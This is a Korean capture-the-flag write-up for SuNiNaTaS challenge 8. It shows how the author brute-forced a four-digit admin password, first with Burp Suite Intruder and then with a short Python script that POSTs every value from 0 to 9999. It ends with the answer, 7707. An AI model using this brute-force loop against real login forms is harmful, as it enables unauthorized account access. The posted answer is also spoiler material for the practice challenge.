반응형
8번 문제
문제 :
올바른 ID랑 PW를 입력하는 문제처럼 보인다.
개발자 도구로 확인해보면, 힌트를 얻을 수 있다.
ID는 admin이고,
PW는 0~9999 사이 라고 한다.
이건 버프 스위프트(Burp Suite)의 'Intruder'기능을 이용해서 풀어보려고 했다.
id는 admin으로 고정이고,
pw는 0~9999까지의 값 중에 하나이므로 변화할 값 부분에 '$값$'을 추가해서 값에 설정한다.
이후, payloads를 아래처럼 설정을 했다.
- payload set은 payload가 1개이므로 1로 설정,
- payload type은 숫자이니까 Numbers로 설정
- 그러면 Payload Options으로 숫자 범위를 지정해준다.
From : 0, To : 9999, Step : 1 (증가 되는 숫자 크기)
위처럼 세팅한 후에 실행(Start Attack 버튼을 누른다)을 한다.
실행하면 정답인 PW에서 Length의 값에 변화가 있을 텐데...
Professioanl 버전을 사용하지 않아 너무 느려서 Python으로 코드를 짰다.
코드 :
import requests
import time
import sys
url="http://suninatas.com/challenge/web08/web08.asp"
expression="Password Incorrect!"
def brute(ID, PW):
data={'id':ID,'pw':PW}
r=requests.post(url,data=data)
if expression.encode() not in r.content :
print ("Correct password Found : ",PW)
sys.exit()
else :
print ("NOT CORRECT! : ",PW,", Length: ",len(r.content))
time.sleep(0.2)
def main():
for payload in range(0,10000):
brute("admin",payload)
if __name__ == '__main__':
main()
코드 실행 결과 :
답 : 7707
반응형
